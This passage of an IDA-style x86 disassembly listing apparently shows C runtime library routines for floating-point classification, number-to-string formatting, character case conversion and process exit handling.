fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_4301C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4301EB proc near ; CODE XREF: sub_42A636+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_430202
cmp [ebp+arg_0], edx
jnz short loc_430214
push 1
jmp short loc_43023E
; ---------------------------------------------------------------------------
loc_430202: ; CODE XREF: sub_4301EB+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_430214
cmp [ebp+arg_0], edx
jnz short loc_430214
push 2
jmp short loc_43023E
; ---------------------------------------------------------------------------
loc_430214: ; CODE XREF: sub_4301EB+11�j
; sub_4301EB+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_430227
push 3
jmp short loc_43023E
; ---------------------------------------------------------------------------
loc_430227: ; CODE XREF: sub_4301EB+36�j
cmp cx, 7FF0h
jnz short loc_430241
test [ebp+arg_4], 7FFFFh
jnz short loc_43023C
cmp [ebp+arg_0], edx
jz short loc_430241
loc_43023C: ; CODE XREF: sub_4301EB+4A�j
push 4
loc_43023E: ; CODE XREF: sub_4301EB+15�j
; sub_4301EB+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_430241: ; CODE XREF: sub_4301EB+41�j
; sub_4301EB+4F�j
xor eax, eax
pop ebp
retn
sub_4301EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_430245(double, int)
sub_430245 proc near ; CODE XREF: sub_42FE97+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp dbl_437628
push esi
fnstsw ax
sahf
jnz short loc_430265
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_4302FB
; ---------------------------------------------------------------------------
loc_430265: ; CODE XREF: sub_430245+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_4302D4
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_43027D
cmp dword ptr [ebp+arg_0], ecx
jz short loc_4302D4
loc_43027D: ; CODE XREF: sub_430245+31�j
fld [ebp+arg_0]
fcomp dbl_437628
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_430295
push 1
pop eax
jmp short loc_430297
; ---------------------------------------------------------------------------
loc_430295: ; CODE XREF: sub_430245+49�j
xor eax, eax
loc_430297: ; CODE XREF: sub_430245+4E�j
; sub_430245+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_4302B0
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_4302AA
or dword ptr [ebp+arg_0+4], 1
loc_4302AA: ; CODE XREF: sub_430245+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_430297
; ---------------------------------------------------------------------------
loc_4302B0: ; CODE XREF: sub_430245+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_4302BE
or byte ptr [ebp+arg_0+7], 80h
loc_4302BE: ; CODE XREF: sub_430245+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_4301C2
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_4302FB
; ---------------------------------------------------------------------------
loc_4302D4: ; CODE XREF: sub_430245+28�j
; sub_430245+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_4301C2
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_4302FB: ; CODE XREF: sub_430245+1B�j
; sub_430245+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_430245 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430306 proc near ; CODE XREF: sub_42FBE4+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_430306 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430314 proc near ; CODE XREF: sub_42FBE4+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_430314 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430323 proc near ; CODE XREF: sub_42A636+13�p
; sub_42A636+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_430323 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430346 proc near ; CODE XREF: sub_42FE97+1D�p
; sub_42FE97+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_43035D
fld tbyte_4536D8
fistp [ebp+arg_0]
wait
loc_43035D: ; CODE XREF: sub_430346+B�j
test cl, 8
jz short loc_430372
fstsw ax
fld tbyte_4536D8
fstp [ebp+var_8]
wait
fstsw ax
loc_430372: ; CODE XREF: sub_430346+1A�j
test cl, 10h
jz short loc_430381
fld tbyte_4536E4
fstp [ebp+var_8]
wait
loc_430381: ; CODE XREF: sub_430346+2F�j
test cl, 4
jz short loc_43038F
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_43038F: ; CODE XREF: sub_430346+3E�j
test cl, 20h
jz short locret_43039A
fldpi
fstp [ebp+var_8]
wait
locret_43039A: ; CODE XREF: sub_430346+4C�j
leave
retn
sub_430346 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43039C proc near ; CODE XREF: sub_42A705+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_430458
cmp ebx, 8Ah
jg loc_430458
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_453BE4[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_4303DB
cmp edi, 2
jle short loc_4303DB
inc esi
loc_4303DB: ; CODE XREF: sub_43039C+37�j
; sub_43039C+3C�j
call sub_4338BB
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_453B04
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_43044E
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_430454
cmp dword_453B08, 0
jz short loc_430454
lea eax, [ebp+var_24]
push eax
call sub_433B70
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_430454
loc_43044E: ; CODE XREF: sub_43039C+90�j
add ecx, dword_453B0C
loc_430454: ; CODE XREF: sub_43039C+96�j
; sub_43039C+9F�j ...
mov eax, ecx
jmp short loc_43045B
; ---------------------------------------------------------------------------
loc_430458: ; CODE XREF: sub_43039C+13�j
; sub_43039C+1F�j
or eax, 0FFFFFFFFh
loc_43045B: ; CODE XREF: sub_43039C+BA�j
pop ebx
leave
retn
sub_43039C endp
; =============== S U B R O U T I N E =======================================
sub_43045E proc near ; CODE XREF: sub_430611+9�p
arg_0 = dword ptr 4
push ebx
xor ebx, ebx
cmp dword_676988, ebx
jnz short loc_43047C
mov eax, [esp+4+arg_0]
cmp eax, 41h
jl short loc_4304CB
cmp eax, 5Ah
jg short loc_4304CB
add eax, 20h
pop ebx
retn
; ---------------------------------------------------------------------------
loc_43047C: ; CODE XREF: sub_43045E+9�j
push esi
mov esi, offset dword_676EBC
push edi
push esi
call dword_437220 ; InterlockedIncrement
cmp dword_676EB8, ebx
mov edi, dword_43721C
jz short loc_4304A6
push esi
call edi ; dword_43721C
push 13h
call sub_42DA1F
pop ecx
push 1
pop ebx
loc_4304A6: ; CODE XREF: sub_43045E+38�j
push [esp+0Ch+arg_0]
call sub_4304CD
test ebx, ebx
pop ecx
mov [esp+0Ch+arg_0], eax
jz short loc_4304C2
push 13h
call sub_42DA80
pop ecx
jmp short loc_4304C5
; ---------------------------------------------------------------------------
loc_4304C2: ; CODE XREF: sub_43045E+58�j
push esi
call edi ; dword_43721C
loc_4304C5: ; CODE XREF: sub_43045E+62�j
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
loc_4304CB: ; CODE XREF: sub_43045E+12�j
; sub_43045E+17�j
pop ebx
retn
sub_43045E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4304CD proc near ; CODE XREF: sub_42A7F0+94�p
; sub_42A7F0+9E�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_676988, 0
push ebx
push esi
push edi
jnz short loc_4304FA
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_430593
cmp eax, 5Ah
jg loc_430593
add eax, 20h
jmp loc_430593
; ---------------------------------------------------------------------------
loc_4304FA: ; CODE XREF: sub_4304CD+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_43052E
cmp dword_4535A4, esi
jle short loc_43051C
push esi
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_430526
; ---------------------------------------------------------------------------
loc_43051C: ; CODE XREF: sub_4304CD+42�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, esi
loc_430526: ; CODE XREF: sub_4304CD+4D�j
test eax, eax
jnz short loc_43052E
loc_43052A: ; CODE XREF: sub_4304CD+AD�j
mov eax, ebx
jmp short loc_430593
; ---------------------------------------------------------------------------
loc_43052E: ; CODE XREF: sub_4304CD+3A�j
; sub_4304CD+5B�j
mov edx, off_453398
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_430552
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_43055B
; ---------------------------------------------------------------------------
loc_430552: ; CODE XREF: sub_4304CD+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_43055B: ; CODE XREF: sub_4304CD+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_676988
call sub_430CCF
add esp, 20h
test eax, eax
jz short loc_43052A
cmp eax, esi
jnz short loc_430586
movzx eax, [ebp+var_4]
jmp short loc_430593
; ---------------------------------------------------------------------------
loc_430586: ; CODE XREF: sub_4304CD+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_430593: ; CODE XREF: sub_4304CD+16�j
; sub_4304CD+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4304CD endp
; =============== S U B R O U T I N E =======================================
sub_430598 proc near ; CODE XREF: sub_42A8C0+F�p
push 30000h
push 10000h
call sub_433F2F
pop ecx
pop ecx
retn
sub_430598 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4305AA proc near ; CODE XREF: sub_4305E8:loc_43060C�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_437638
fstp [ebp+var_8]
fld dbl_437630
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_437430
fnstsw ax
sahf
jbe short loc_4305E4
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_4305E4: ; CODE XREF: sub_4305AA+33�j
xor eax, eax
leave
retn
sub_4305AA endp
; =============== S U B R O U T I N E =======================================
sub_4305E8 proc near ; CODE XREF: sub_42A8C0+5�p
push offset aKernel32 ; "KERNEL32"
call dword_437070 ; GetModuleHandleA
test eax, eax
jz short loc_43060C
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_437030 ; GetProcAddress
test eax, eax
jz short loc_43060C
push 0
call eax ; sub_42A8C0
retn
; ---------------------------------------------------------------------------
loc_43060C: ; CODE XREF: sub_4305E8+D�j
; sub_4305E8+1D�j
jmp sub_4305AA
sub_4305E8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_430611 proc near ; CODE XREF: sub_42DBAD+3CB�p
; DATA XREF: sub_42A8D8+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_43045E
cmp eax, 65h
pop ecx
jz short loc_430651
loc_430625: ; CODE XREF: sub_430611+3E�j
inc esi
cmp dword_4535A4, 1
jle short loc_43063E
movsx eax, byte ptr [esi]
push 4
push eax
call sub_42F05B
pop ecx
pop ecx
jmp short loc_43064D
; ---------------------------------------------------------------------------
loc_43063E: ; CODE XREF: sub_430611+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_453398
mov al, [ecx+eax*2]
and eax, 4
loc_43064D: ; CODE XREF: sub_430611+2B�j
test eax, eax
jnz short loc_430625
loc_430651: ; CODE XREF: sub_430611+12�j
mov cl, byte_4535A8
mov al, [esi]
mov [esi], cl
inc esi
loc_43065C: ; CODE XREF: sub_430611+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_43065C
pop esi
retn
sub_430611 endp
; =============== S U B R O U T I N E =======================================
sub_43066B proc near ; CODE XREF: sub_42DBAD+3E2�p
; DATA XREF: sub_42A8D8+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_4535A8
mov cl, [eax]
test cl, cl
jz short loc_430687
loc_43067B: ; CODE XREF: sub_43066B+1A�j
cmp cl, dl
jz short loc_430687
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_43067B
loc_430687: ; CODE XREF: sub_43066B+E�j
; sub_43066B+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_4306B8
loc_43068E: ; CODE XREF: sub_43066B+34�j
mov cl, [eax]
test cl, cl
jz short loc_4306A1
cmp cl, 65h
jz short loc_4306A1
cmp cl, 45h
jz short loc_4306A1
inc eax
jmp short loc_43068E
; ---------------------------------------------------------------------------
loc_4306A1: ; CODE XREF: sub_43066B+27�j
; sub_43066B+2C�j ...
mov ecx, eax
loc_4306A3: ; CODE XREF: sub_43066B+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_4306A3
cmp [eax], dl
jnz short loc_4306AE
dec eax
loc_4306AE: ; CODE XREF: sub_43066B+40�j
; sub_43066B+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_4306AE
locret_4306B8: ; CODE XREF: sub_43066B+21�j
retn
sub_43066B endp
; =============== S U B R O U T I N E =======================================
sub_4306B9 proc near ; DATA XREF: sub_42A8D8+28�o
; .text:off_45380C�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_437628
fnstsw ax
sahf
jb short loc_4306CE
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4306CE: ; CODE XREF: sub_4306B9+F�j
xor eax, eax
retn
sub_4306B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4306D1 proc near ; CODE XREF: sub_42E525+430�p
; DATA XREF: sub_42A8D8+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_4306FA
lea eax, [ebp+var_8]
push eax
call sub_4343F2
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_4306FA: ; CODE XREF: sub_4306D1+C�j
lea eax, [ebp+arg_8]
push eax
call sub_43441F
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_4306D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43070F proc near ; CODE XREF: sub_4309C1+47�p
var_3C = qword ptr -3Ch
var_28 = byte ptr -28h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+var_28]
push esi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+3Ch+var_3C]
call sub_4344C3
mov esi, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
mov edx, [ebp+arg_4]
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_43444C
lea eax, [ebp+var_10]
push 0
push eax
push [ebp+arg_C]
push esi
push [ebp+arg_4]
call sub_430770
mov eax, [ebp+arg_4]
add esp, 30h
pop esi
leave
retn
sub_43070F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430770 proc near ; CODE XREF: sub_43070F+53�p
; sub_43092E+86�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_10], bl
push esi
mov esi, [ebp+arg_C]
push edi
mov edi, [ebp+arg_0]
jz short loc_43079E
xor eax, eax
cmp [ebp+arg_4], ebx
setnle al
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, edi
push eax
call sub_430A12
pop ecx
pop ecx
loc_43079E: ; CODE XREF: sub_430770+11�j
cmp dword ptr [esi], 2Dh
mov eax, edi
jnz short loc_4307AB
mov byte ptr [edi], 2Dh
lea eax, [edi+1]
loc_4307AB: ; CODE XREF: sub_430770+33�j
cmp [ebp+arg_4], ebx
jle short loc_4307C2
mov dl, [eax+1]
lea ecx, [eax+1]
mov [eax], dl
mov eax, ecx
mov cl, byte_4535A8
mov [eax], cl
loc_4307C2: ; CODE XREF: sub_430770+3E�j
xor ecx, ecx
cmp [ebp+arg_10], bl
push offset aE000 ; "e+000"
setz cl
add ecx, eax
add ecx, [ebp+arg_4]
push ecx
call sub_42A500
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
mov ecx, eax
jz short loc_4307E6
mov byte ptr [ecx], 45h
loc_4307E6: ; CODE XREF: sub_430770+71�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_43082B
mov ebx, [esi+4]
dec ebx
jns short loc_4307FA
neg ebx
mov byte ptr [ecx], 2Dh
loc_4307FA: ; CODE XREF: sub_430770+83�j
inc ecx
cmp ebx, 64h
jl short loc_430811
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_430811: ; CODE XREF: sub_430770+8E�j
inc ecx
cmp ebx, 0Ah
jl short loc_430828
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_430828: ; CODE XREF: sub_430770+A5�j
add [ecx+1], bl
loc_43082B: ; CODE XREF: sub_430770+7D�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_430770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430832 proc near ; CODE XREF: sub_4309C1+1E�p
var_3C = qword ptr -3Ch
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+var_28]
push esi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+3Ch+var_3C]
call sub_4344C3
mov esi, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_43444C
lea eax, [ebp+var_10]
push 0
push eax
push esi
push [ebp+arg_4]
call sub_430887
mov eax, [ebp+arg_4]
add esp, 2Ch
pop esi
leave
retn
sub_430832 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430887 proc near ; CODE XREF: sub_430832+47�p
; sub_43092E+6F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
push edi
mov eax, [esi+4]
dec eax
cmp [ebp+arg_C], 0
jz short loc_4308B7
cmp eax, [ebp+arg_4]
jnz short loc_4308B7
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebx
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_4308B7: ; CODE XREF: sub_430887+14�j
; sub_430887+19�j
cmp dword ptr [esi], 2Dh
mov edi, ebx
jnz short loc_4308C4
mov byte ptr [ebx], 2Dh
lea edi, [ebx+1]
loc_4308C4: ; CODE XREF: sub_430887+35�j
mov eax, [esi+4]
test eax, eax
jg short loc_4308DB
push 1
push edi
call sub_430A12
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_4308DD
; ---------------------------------------------------------------------------
loc_4308DB: ; CODE XREF: sub_430887+42�j
add edi, eax
loc_4308DD: ; CODE XREF: sub_430887+52�j
cmp [ebp+arg_4], 0
jle short loc_430927
push 1
push edi
call sub_430A12
mov al, byte_4535A8
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_430927
cmp [ebp+arg_C], 0
jz short loc_430906
neg esi
jmp short loc_43090D
; ---------------------------------------------------------------------------
loc_430906: ; CODE XREF: sub_430887+79�j
neg esi
cmp [ebp+arg_4], esi
jl short loc_430910
loc_43090D: ; CODE XREF: sub_430887+7D�j
mov [ebp+arg_4], esi
loc_430910: ; CODE XREF: sub_430887+84�j
push [ebp+arg_4]
push edi
call sub_430A12
push [ebp+arg_4]
push 30h
push edi
call sub_429690
add esp, 14h
loc_430927: ; CODE XREF: sub_430887+5A�j
; sub_430887+73�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_430887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43092E proc near ; CODE XREF: sub_4309C1+34�p
var_44 = qword ptr -44h
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+44h+var_44]
call sub_4344C3
mov eax, [ebp+var_C]
mov ebx, [ebp+arg_8]
lea esi, [eax-1]
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push edi
call sub_43444C
mov eax, [ebp+var_C]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_4309A7
cmp eax, ebx
jge short loc_4309A7
test cl, cl
jz short loc_430993
loc_430989: ; CODE XREF: sub_43092E+60�j
mov al, [edi]
inc edi
test al, al
jnz short loc_430989
and [edi-2], al
loc_430993: ; CODE XREF: sub_43092E+59�j
lea eax, [ebp+var_10]
push 1
push eax
push ebx
push [ebp+arg_4]
call sub_430887
add esp, 10h
jmp short loc_4309BC
; ---------------------------------------------------------------------------
loc_4309A7: ; CODE XREF: sub_43092E+51�j
; sub_43092E+55�j
lea eax, [ebp+var_10]
push 1
push eax
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
call sub_430770
add esp, 14h
loc_4309BC: ; CODE XREF: sub_43092E+77�j
pop edi
pop esi
pop ebx
leave
retn
sub_43092E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4309C1 proc near ; CODE XREF: sub_42DBAD+3AA�p
; DATA XREF: sub_42A8D8�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_4309FC
cmp [ebp+arg_8], 45h
jz short loc_4309FC
cmp [ebp+arg_8], 66h
jnz short loc_4309E9
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_430832
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4309E9: ; CODE XREF: sub_4309C1+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43092E
jmp short loc_430A0D
; ---------------------------------------------------------------------------
loc_4309FC: ; CODE XREF: sub_4309C1+7�j
; sub_4309C1+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43070F
loc_430A0D: ; CODE XREF: sub_4309C1+39�j
add esp, 10h
pop ebp
retn
sub_4309C1 endp
; =============== S U B R O U T I N E =======================================
sub_430A12 proc near ; CODE XREF: sub_430770+27�p
; sub_430887+47�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_430A35
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_4292D0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_42B9C0
add esp, 10h
pop esi
loc_430A35: ; CODE XREF: sub_430A12+7�j
pop edi
retn
sub_430A12 endp
; =============== S U B R O U T I N E =======================================
sub_430A37 proc near ; CODE XREF: .text:0042C549�p
mov eax, off_450E48
test eax, eax
jz short loc_430A42
call eax ; sub_42A8C0
loc_430A42: ; CODE XREF: sub_430A37+7�j
push offset dword_43A028
push offset dword_43A014
call sub_430B3D
push offset dword_43A010
push offset dword_43A000
call sub_430B3D
add esp, 10h
retn
sub_430A37 endp
; =============== S U B R O U T I N E =======================================
sub_430A64 proc near ; CODE XREF: .text:0042C588�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_430A86
add esp, 0Ch
retn
sub_430A64 endp
; =============== S U B R O U T I N E =======================================
sub_430A75 proc near ; CODE XREF: .text:0042ABB6�p
; .text:0042C5A7�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_430A86
add esp, 0Ch
retn
sub_430A75 endp
; =============== S U B R O U T I N E =======================================
sub_430A86 proc near ; CODE XREF: sub_430A64+8�p
; sub_430A75+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
call sub_430B2B
push 1
pop edi
cmp dword_6769EC, edi
jnz short loc_430AA8
push [esp+4+arg_0]
call dword_43704C ; GetCurrentProcess
push eax
call dword_43710C ; TerminateProcess
loc_430AA8: ; CODE XREF: sub_430A86+F�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_6769E8, edi
mov byte_6769E4, bl
jnz short loc_430AFC
mov eax, dword_676EB4
test eax, eax
jz short loc_430AEB
mov ecx, dword_676EB0
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_430AEA
loc_430AD7: ; CODE XREF: sub_430A86+62�j
mov eax, [esi]
test eax, eax
jz short loc_430ADF
call eax
loc_430ADF: ; CODE XREF: sub_430A86+55�j
sub esi, 4
